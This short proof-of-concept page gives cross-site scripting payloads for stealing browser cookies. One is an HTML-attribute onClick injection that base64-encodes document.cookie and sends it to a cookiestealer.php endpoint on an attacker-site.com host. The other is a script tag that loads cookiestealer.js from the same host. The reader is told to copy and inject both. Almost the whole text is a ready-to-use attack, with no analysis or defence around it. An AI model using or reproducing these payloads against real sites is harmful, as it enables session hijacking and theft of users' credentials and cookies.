Cookie PoC
HTML ATTRIBUTE (xss without script tags)
Copy this payload and inject it into the html attribte: " onClick="x='http://online.attacker-site.com/cookie-monster/cookiestealer.php'; y=btoa(document.cookie); z=x+'&stolen='+y; w=new XMLHttpRequest(); w.open('GET', z); w.send();
1) Send request
2) Now, go to see!
XSS with Script tags
Copy this payload and inject it into the html attribte: <script src="http://online.attacker-site.com/cookie-monster/cookiestealer.js" > </script>